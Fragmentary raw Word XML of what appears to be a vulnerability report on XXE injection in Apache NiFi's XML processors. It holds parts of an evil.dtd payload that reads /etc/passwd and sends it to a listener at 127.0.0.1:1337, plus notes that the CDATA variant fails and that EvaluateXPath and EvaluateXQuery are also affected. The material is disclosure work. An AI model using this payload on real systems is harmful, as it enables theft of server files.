        <w:t>/passwd contain illegal characters that cannot be declared in a parameter entity and therefore will require a workaround.</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----------evil.dtd------------</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file SYSTEM "file:///etc/passwd"&gt;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start "&lt;![CDATA["&gt;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end "]]&gt;"&gt;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wrapper "&lt;!ENTITY all '%start;%file;%end;'&gt;"&gt;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%wrapper;</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&lt;!ENTITY % wrap "&lt;!ENTITY send SYSTEM '</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00695C4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://127.0.0.1:1337/?%all;</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'&gt;"&gt;</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%wrap;</w:t>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rStyle w:val="im"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-----------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="500050"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">This uses XML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> which will allow the use of special characters without the need to escape or encode them. Still, Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> cannot process </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default which limits the vulnerability to files that do not contain special characters. When attempting this exploit with the above XML, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>recieves</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> no data.</w:t>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00695C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A633B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ABFFE9C" wp14:editId="4DFD17FF">
            <wp:extent cx="4584700" cy="2578894"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="22061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1861"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6176" cy="2579724"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B22D1" w14:textId="6C23AFDD" w:rsidR="00E2320B" w:rsidRDefault="00695C4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type of vulnerability also exists in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>EvaluateXPath</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EvaluateXQuery</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processors</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:sectPr w:rsidR="00E2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B"/>
    <w:rsid w:val="00695C4D"/>
    <w:rsid w:val="00A633B9"/>
    <w:rsid w:val="00B77AF9"/>
    <w:rsid w:val="00DB4183"/>
    <w:rsid w:val="00E2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B6FE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{270C3558-A294-45C8-AB97-D92E1063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695C4D"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00695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337/?%25fil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80/evil.dtd" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:1337/?%25passwd;" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:1337/?%25passwd;" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:1337/?%25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stevens</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>grant stevens</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-11T05:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-13T05:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>